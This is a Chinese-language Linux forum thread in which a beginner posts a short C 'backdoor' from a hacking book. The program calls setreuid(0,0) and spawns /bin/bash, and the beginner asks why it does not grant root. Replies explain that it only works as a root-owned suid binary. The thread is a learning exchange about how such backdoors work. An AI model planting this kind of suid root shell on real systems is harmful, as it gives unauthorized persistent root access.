1. PTT
  2. LinuxDev

[問題] 關於後門程式

作者: slshsb200300 (Javier)   2014-08-27 15:47:49
我這新手又來問菜問題了...囧
身邊又沒有會的人可問
只好厚著臉皮來了XD
剛在看駭客訓練基地-決戰台灣版這本書
看到後門程式時...程式碼如下
#include <sys/types.h>
#include <unistd.h>
void main()
{
setreuid(0,0);
execl("/bin/bash","bash",(char *)0);
}
結果如下圖
http://imgur.com/EM9LqYD
執行完後卻無法像書上寫的獲得root權限
請問這是什麼原因造成呢@@?
作者: mshockwave (夏克維夫)   2014-08-28 05:29:00
嗯...使用setreuid應該也要root權限你這應該是類似shellcode吧 也就是你的exploit要先破解擁有最高權限的程式或是取得適當權限 這樣你在執行shellcode時才能擁有root權限
作者: lantw44 (#######################)   2014-08-29 14:18:00
suid-shell 的 擁有者 是 root 嗎?
作者: slshsb200300 (Javier)   2014-08-29 16:23:00
哈...感謝兩位大大我看懂了T T
作者: mshockwave (夏克維夫)   2014-08-30 16:22:00
Re樓上上:yes
繼續閱讀
Re: [問題] 請問能不能查詢link時連到哪個檔案jservRe: [問題] embedded linux 有推薦的distribution嗎jservRe: [問題] QT 觸控問題jservRe: [問題] 編譯RPI的kerneljserv[問題] QT 觸控問題sho330[問題] 編譯RPI的kerneltrans7749[問題] 如何學習找系統漏洞slshsb200300[問題] embedded linux 有推薦的distribution嗎ss780217[問題] 請問能不能查詢link時連到哪個檔案jianiauRe: [問題] linux driver初始化時從SD卡載入configghostplayer

Links booklink

Contact Us: admin [ a t ] ucptt.com